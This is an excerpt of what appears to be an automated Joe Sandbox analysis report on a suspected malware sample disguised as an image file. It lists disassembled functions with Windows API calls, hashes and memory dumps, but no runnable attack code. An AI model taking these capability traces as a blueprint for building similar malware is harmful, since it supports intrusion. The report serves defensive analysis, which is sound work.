Opcode Fuzzy Hash: 8310e3a4859446ec1c43cb02753b8de59e1bfd24db9d7be5316305017186fb44
Instruction Fuzzy Hash: 641190B125021DBEEF115FA1CC85EEB7F6DFF09798F014115BA08A60A0C772AC21DBA4

Function 0009CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0009CCF6
GetWindowRect.USER32(?,?), ref: 0009CD37
ScreenToClient.USER32(?,?), ref: 0009CD5F
GetClientRect.USER32(?,?), ref: 0009CE8C
GetWindowRect.USER32(?,?), ref: 0009CEA5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
Instruction ID: deea928d8932641a63e09e30b8874e9d8c115fd0a83c9f7996e11fd4235b1c46
Opcode Fuzzy Hash: 5e84639d228de236c70671fcbe7ac0bc1ccb7af3a98adde89045e9025f96cf49
Instruction Fuzzy Hash: F7B15B79900249DBEF60CFA8C480BEDB7F1FF08300F148529ED5AAB650DB70A950EB64

Function 000E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000E1C18
Process32FirstW.KERNEL32(00000000,?), ref: 000E1C26
__wsplitpath.LIBCMT ref: 000E1C54

Part of subcall function 000A1DFC: __wsplitpath_helper.LIBCMT ref: 000A1E3C

_wcscat.LIBCMT ref: 000E1C69
Process32NextW.KERNEL32(00000000,?), ref: 000E1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 000E1CF1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 0be0c841bbe8b0853522d455e5d18fb01959a08cbf48b8491365af8aaa1884d9
Instruction ID: 29a5fc9abc001478e91cb59cf9568bd6ba6afe955a5c933e709a935ee1aff9ff
Opcode Fuzzy Hash: 0be0c841bbe8b0853522d455e5d18fb01959a08cbf48b8491365af8aaa1884d9
Instruction Fuzzy Hash: 13514E715083419FD720EF64D885EEBB7E8EF88754F04491EF58697252EB70D904CBA2

Function 000E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2BB5,?,?), ref: 000E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000E3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000E313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 000E317E
RegCloseKey.ADVAPI32(00000000), ref: 000E318B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: bf84cfe79d922b0820873ad87e0c2ba8648314f52261ac6cbd9244523bc61f5f
Instruction ID: fb852a16acad92abc5f1a68359e41ff60d55abb1dba8a6bc73862382f59dc4e4
Opcode Fuzzy Hash: bf84cfe79d922b0820873ad87e0c2ba8648314f52261ac6cbd9244523bc61f5f
Instruction Fuzzy Hash: ED515431208340AFC704EF64C895EAEBBE9BF88300F04496DF595972A2DB71EA05CB52

Function 000E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 000E8540
GetMenuItemCount.USER32(00000000), ref: 000E8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000E859F
GetMenuItemID.USER32(?,?), ref: 000E860E
GetSubMenu.USER32(?,?), ref: 000E861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 000E866D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 4157c1b83ee2351b94b5b029a4691c55df8b11836603c25b40c52990e059843b
Instruction ID: 1ecf237440ca2cb823b9e5c228d9be25abbea905d81689d8db12c6a524533472
Opcode Fuzzy Hash: 4157c1b83ee2351b94b5b029a4691c55df8b11836603c25b40c52990e059843b
Instruction Fuzzy Hash: FE51AE31A00615AFCF11EF95C845AEEB7F4FF48310F108469E919BB352DB70AE418B90

Function 000C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4B5B
IsMenu.USER32(00000000), ref: 000C4B7B
CreatePopupMenu.USER32 ref: 000C4BAF
GetMenuItemCount.USER32(000000FF), ref: 000C4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000C4C3E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
Instruction ID: 428f1835f885e1df167138f627f6534e1a8b1984fb5fe714c4e1834f26a3924c
Opcode Fuzzy Hash: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
Instruction Fuzzy Hash: 3851AC70601209EBDF60CFA8D898FEDBBF4BF45318F14815DE8559A2A1D3B1AD44CB51

Function 000D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0011DC00), ref: 000D8E7C
WSAGetLastError.WSOCK32(00000000), ref: 000D8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 000D8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 000D8EC5
_strlen.LIBCMT ref: 000D8EF7
WSAGetLastError.WSOCK32(00000000), ref: 000D8F6A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 81a14bd8dd9316f064bfc299e3ed32d34651c7213b1697b3fa9ad81d6b281fcf
Instruction ID: 0d92d266e08d874aa14cbf82e43709b342a9b7604ca40a9bb242f53a009da78a
Opcode Fuzzy Hash: 81a14bd8dd9316f064bfc299e3ed32d34651c7213b1697b3fa9ad81d6b281fcf
Instruction Fuzzy Hash: 8441D271500204AFCB14EBA4DD95EEEB7B9EF18314F10866AF15A972D2DF30AE40CB60

Function 0009ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

BeginPaint.USER32(?,?,?), ref: 0009AC2A
GetWindowRect.USER32(?,?), ref: 0009AC8E
ScreenToClient.USER32(?,?), ref: 0009ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0009ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0009AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000FE673

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
Instruction ID: 13f48d54192c0f97402cdda3071878b23b51213256882080154b271ae1fd0df2
Opcode Fuzzy Hash: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
Instruction Fuzzy Hash: 2741D770204304AFCB10DF64DC84FBA7BE8EB56370F140669F9A5876B1C7719885EBA2

Function 000EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00141628,00000000,00141628,00000000,00000000,00141628,?,000FDC5D,00000000,?,00000000,00000000,00000000,?,000FDAD1,00000004), ref: 000EE40B
EnableWindow.USER32(00000000,00000000), ref: 000EE42F
ShowWindow.USER32(00141628,00000000), ref: 000EE48F
ShowWindow.USER32(00000000,00000004), ref: 000EE4A1
EnableWindow.USER32(00000000,00000001), ref: 000EE4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000EE4E8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
Instruction ID: 2c45af9e684d57d090c08e50a45a1a1b73ff29a485f44f1e5a9cb865f410c97c
Opcode Fuzzy Hash: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
Instruction Fuzzy Hash: 8B4180746015C8EFDB62CF25C499B947BE1BF09304F2881A9FA58AF2E2C771E841CB51

Function 000C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 000C98D1

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000C9908
EnterCriticalSection.KERNEL32(?), ref: 000C9924
LeaveCriticalSection.KERNEL32(?), ref: 000C999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000C99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 000C99D2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
Instruction ID: 410d9dc983c158b8251cc8f869b0455e727503d7a2fe6f904db7f3f91d3c4ac1
Opcode Fuzzy Hash: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
Instruction Fuzzy Hash: 85313031900105EBDF109F95DC85EAE77B8FF45710B148069F905AB246D770DE54DBA0

Function 000D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,000D77F4,?,?,00000000,00000001), ref: 000D9B53

Part of subcall function 000D6544: GetWindowRect.USER32(?,?), ref: 000D6557

GetDesktopWindow.USER32 ref: 000D9B7D
GetWindowRect.USER32(00000000), ref: 000D9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 000D9BB6

Part of subcall function 000C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

GetCursorPos.USER32(?), ref: 000D9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000D9C44

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
Instruction ID: 213918cf9d22512e443be4fbec4f3e0d521bf084b363c8f0e7fa827c9ab12e25
Opcode Fuzzy Hash: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
Instruction Fuzzy Hash: DB31C172104305ABC710DF68DC49F9AB7E9FF88314F00091AF589E7282DB71E948CBA2

Function 000BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000BAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 000BAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000BAFC4
CloseHandle.KERNEL32(00000004), ref: 000BAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BAFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 000BB012

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
Instruction ID: de1d86a58724d539577a5738bd5e6463b5954b9f6498a9470c748088cd48ad16
Opcode Fuzzy Hash: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
Instruction Fuzzy Hash: 4D214CB220420AABDB129FD4ED09BEE7BA9EB45304F044025FA41A6161C7B6DD61EB61

Function 000EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000EEC20
LineTo.GDI32(00000000,00000003,?), ref: 000EEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEC42
LineTo.GDI32(00000000,00000000,?), ref: 000EEC52
EndPath.GDI32(00000000), ref: 000EEC62
StrokePath.GDI32(00000000), ref: 000EEC72

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
Instruction ID: e8c117894cba6f467ce334ebbe71b983ba2ec01ab9f12046d1c993773ae0a2de
Opcode Fuzzy Hash: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
Instruction Fuzzy Hash: C7111B7600014DBFEF029F90EC88EEA7F6DEB08360F048122BE4999570D7B19D95DBA0

Function 000BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000BE1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 000BE1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000BE1D8
ReleaseDC.USER32(00000000,00000000), ref: 000BE1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 000BE1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 000BE209

Part of subcall function 000B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000B9A05,00000000,00000000,?,000B9DDB), ref: 000BA53A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
Instruction ID: 75a460024443a7bcff82820176b4c8db6e34158d2df35d06368e7864126d69dc
Opcode Fuzzy Hash: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
Instruction Fuzzy Hash: F1018FB5A00214BFEB109BE6DC45B9EBFB8EB48351F004066FA08A7290DA719C00CBA0

Function 000A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 000A7B47

Part of subcall function 000A123A: __initp_misc_winsig.LIBCMT ref: 000A125E
Part of subcall function 000A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A7F51
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A7F65
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A7F78
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A7F8B
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A7F9E
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000A7FB1
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000A7FC4
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000A7FD7
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000A7FEA
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000A7FFD
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000A8010
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000A8023
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000A8036
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000A8049
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000A805C
Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000A806F

__mtinitlocks.LIBCMT ref: 000A7B4C

Part of subcall function 000A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0013AC68,00000FA0,?,?,000A7B51,000A5E77,00136C70,00000014), ref: 000A7E41

__mtterm.LIBCMT ref: 000A7B55

Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D3F
Part of subcall function 000A7BBD: _free.LIBCMT ref: 000A7D46
Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(0013AC68,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D68

__calloc_crt.LIBCMT ref: 000A7B7A
GetCurrentThreadId.KERNEL32 ref: 000A7BA3

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
Instruction ID: c50d5c478a7375e7982581d2a898e457a0da413691835fac509de6a826304b90
Opcode Fuzzy Hash: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
Instruction Fuzzy Hash: F4F0907212D31219EA65B7F47C06BCB26D49F43731F2486A9F8ACC90D3FF25884141B1

Function 000827EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0008281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00082825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00082830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0008283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00082843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0008284B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
